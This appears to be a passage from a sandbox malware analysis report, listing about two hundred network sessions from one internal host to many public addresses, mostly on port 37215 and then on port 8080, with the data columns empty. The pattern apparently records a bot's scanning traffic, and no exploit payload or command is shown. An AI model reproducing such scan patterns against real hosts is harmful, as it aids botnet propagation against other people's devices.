                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28328192.168.2.2346016157.93.120.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28329192.168.2.235550841.122.209.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28330192.168.2.2335418197.187.32.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28331192.168.2.2353746157.159.24.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28332192.168.2.2358532171.37.152.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28333192.168.2.235480632.202.187.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28334192.168.2.2348072197.8.185.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28335192.168.2.2342844197.87.250.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28336192.168.2.2345020197.223.222.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28337192.168.2.235839494.187.90.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28338192.168.2.2360698197.248.235.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28339192.168.2.2335792145.41.47.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28340192.168.2.2358344197.136.153.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28341192.168.2.2341932157.142.243.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28342192.168.2.234683041.217.166.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28343192.168.2.234028241.81.149.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28344192.168.2.2335762197.2.80.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28345192.168.2.2350144157.139.117.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28346192.168.2.234425282.73.122.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28347192.168.2.2345366175.116.59.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28348192.168.2.233323241.13.84.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28349192.168.2.2339478199.128.223.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28350192.168.2.2357632197.217.51.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28351192.168.2.2351586197.161.249.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28352192.168.2.2356188197.216.213.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28353192.168.2.2360044153.129.166.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28354192.168.2.235495041.228.39.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28355192.168.2.235680819.239.46.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28356192.168.2.2337194157.206.154.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28357192.168.2.2351850157.120.16.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28358192.168.2.2359344197.31.18.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28359192.168.2.234313441.43.43.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28360192.168.2.2339310157.181.246.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28361192.168.2.234278450.115.98.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28362192.168.2.234377239.176.185.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28363192.168.2.235822672.94.114.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28364192.168.2.2348152157.250.5.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28365192.168.2.233428241.172.41.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28366192.168.2.234144819.183.12.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28367192.168.2.234390062.133.91.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28368192.168.2.2339858197.153.20.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28369192.168.2.2336414220.73.227.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28370192.168.2.2336106197.221.129.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28371192.168.2.2344340197.146.253.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28372192.168.2.2355550197.53.183.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28373192.168.2.2346730157.69.227.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28374192.168.2.234802641.22.85.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28375192.168.2.2349360197.226.216.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28376192.168.2.235124866.138.78.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28377192.168.2.234070058.194.98.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28378192.168.2.233463841.98.208.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28379192.168.2.2359002193.188.79.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28380192.168.2.2338720146.164.192.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28381192.168.2.2347972203.206.183.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28382192.168.2.2344486197.136.72.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28383192.168.2.2359688157.171.247.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28384192.168.2.235874641.3.192.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28385192.168.2.2358100197.91.215.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28386192.168.2.2354684197.170.116.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28387192.168.2.2344170197.12.104.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28388192.168.2.234233498.54.64.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28389192.168.2.2333108197.164.240.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28390192.168.2.2339850157.80.4.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28391192.168.2.236064841.251.70.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28392192.168.2.2346206197.95.133.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28393192.168.2.2344876206.14.69.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28394192.168.2.2334148157.208.139.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28395192.168.2.2356172157.93.124.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28396192.168.2.2337968197.215.154.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28397192.168.2.2359502184.251.11.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28398192.168.2.2359216157.166.105.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28399192.168.2.2349360197.128.118.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28400192.168.2.234054636.89.97.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28401192.168.2.2344336197.113.4.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28402192.168.2.2342736197.70.175.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28403192.168.2.2354850102.163.164.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28404192.168.2.2347962130.55.183.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28405192.168.2.2351730197.46.99.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28406192.168.2.2335000197.7.117.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28407192.168.2.2357972192.72.68.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28408192.168.2.234299041.189.148.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28409192.168.2.2353398133.231.35.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28410192.168.2.234247241.33.86.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28411192.168.2.2349522109.142.224.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28412192.168.2.2335564197.155.9.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28413192.168.2.2349624197.160.149.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28414192.168.2.2352460138.156.152.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28415192.168.2.235571041.1.215.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28416192.168.2.2351236157.164.82.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28417192.168.2.2355670197.209.217.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28418192.168.2.235139841.182.55.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28419192.168.2.2354696197.246.231.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28420192.168.2.234558641.35.171.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28421192.168.2.2360536197.144.162.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28422192.168.2.2343228197.133.116.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28423192.168.2.2340284157.156.27.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28424192.168.2.234189041.120.104.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28425192.168.2.2359124203.66.97.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28426192.168.2.2337526157.74.167.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28427192.168.2.233916441.240.36.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28428192.168.2.234047041.180.30.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28429192.168.2.2346986197.237.151.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28430192.168.2.233656485.249.56.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28431192.168.2.2354272157.213.54.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28432192.168.2.234899665.29.198.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28433192.168.2.2350266157.30.80.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28434192.168.2.2345780173.119.184.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28435192.168.2.2341634197.228.87.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28436192.168.2.2336306157.246.121.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28437192.168.2.234755441.247.215.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28438192.168.2.2344804157.22.13.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28439192.168.2.234674413.143.237.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28440192.168.2.2333060177.129.118.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28441192.168.2.2354844157.227.208.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28442192.168.2.2333366157.56.10.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28443192.168.2.235953254.225.56.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28444192.168.2.234227841.208.35.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28445192.168.2.2337280197.178.175.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28446192.168.2.234784841.159.66.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28447192.168.2.234686241.165.29.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28448192.168.2.234208441.79.97.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28449192.168.2.2347132197.64.152.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28450192.168.2.2352746157.254.235.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28451192.168.2.234574641.191.171.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28452192.168.2.233654441.75.175.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28453192.168.2.2356208197.167.99.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28454192.168.2.2349828157.245.141.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28455192.168.2.2350142212.91.209.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28456192.168.2.235112841.21.42.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28457192.168.2.2337646197.35.202.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28458192.168.2.234018841.214.114.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28459192.168.2.235144641.82.151.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28460192.168.2.2344004101.169.52.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28461192.168.2.233966299.23.157.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28462192.168.2.2355754157.77.197.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28463192.168.2.234949441.241.51.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28464192.168.2.234727241.79.199.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28465192.168.2.235538641.126.113.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28466192.168.2.235455642.183.108.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28467192.168.2.2334890175.62.160.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28468192.168.2.2355084157.232.141.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28469192.168.2.234896441.138.64.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28470192.168.2.2355852154.89.12.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28471192.168.2.2354798157.25.157.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28472192.168.2.233470041.151.35.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28473192.168.2.2337790157.46.17.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28474192.168.2.2333832157.180.52.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28475192.168.2.2357030136.37.238.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28476192.168.2.234898041.120.197.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28477192.168.2.235209441.23.74.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28478192.168.2.2354704157.120.132.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28479192.168.2.2340390162.32.161.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28480192.168.2.2358722197.30.91.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28481192.168.2.234574841.220.213.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28482192.168.2.2355700197.240.85.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28483192.168.2.235641823.195.32.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28484192.168.2.235686441.81.142.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28485192.168.2.2333588197.201.182.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28486192.168.2.2346904197.228.39.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28487192.168.2.2337382157.124.26.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28488192.168.2.233796473.95.203.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28489192.168.2.2341696197.136.251.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28490192.168.2.235930041.83.101.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28491192.168.2.2337446157.73.120.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28492192.168.2.2343492157.242.215.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28493192.168.2.234403296.38.128.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28494192.168.2.2336942100.207.6.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28495192.168.2.2357576188.2.90.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28496192.168.2.2354018218.221.248.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28497192.168.2.234245083.57.94.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28498192.168.2.2354216135.162.89.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28499192.168.2.234404075.232.118.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28500192.168.2.234169072.169.1.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28501192.168.2.2357018142.63.127.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28502192.168.2.234349260.254.248.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28503192.168.2.2355854208.251.158.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28504192.168.2.234197052.30.70.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28505192.168.2.2354322167.219.246.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28506192.168.2.2358106144.106.145.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28507192.168.2.2357164174.226.66.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28508192.168.2.2341304183.79.112.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28509192.168.2.2354530152.131.60.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28510192.168.2.2343648178.183.108.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28511192.168.2.2353152135.35.106.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28512192.168.2.2356240124.133.161.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28513192.168.2.2336350191.21.83.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28514192.168.2.2343476154.232.50.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28515192.168.2.234000844.90.15.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28516192.168.2.2342470143.253.123.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28517192.168.2.2352918149.210.118.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28518192.168.2.2360238100.182.175.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28519192.168.2.2352388135.8.219.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28520192.168.2.236011220.248.157.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28521192.168.2.235725866.136.237.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28522192.168.2.2357970158.168.173.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28523192.168.2.2355400158.165.65.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28524192.168.2.2341372162.222.100.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28525192.168.2.2344452201.243.119.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28526192.168.2.2357468212.60.189.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28527192.168.2.2333584146.102.43.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28528192.168.2.233497678.135.20.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28529192.168.2.2358234113.1.134.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28530192.168.2.23504725.79.32.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28531192.168.2.2346302163.99.246.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28532192.168.2.2333858213.128.163.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28533192.168.2.2357610129.103.83.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28534192.168.2.2346276113.182.242.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28535192.168.2.2359004223.174.219.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28536192.168.2.234486650.15.49.1298080
                                                        TimestampBytes transferredDirectionData


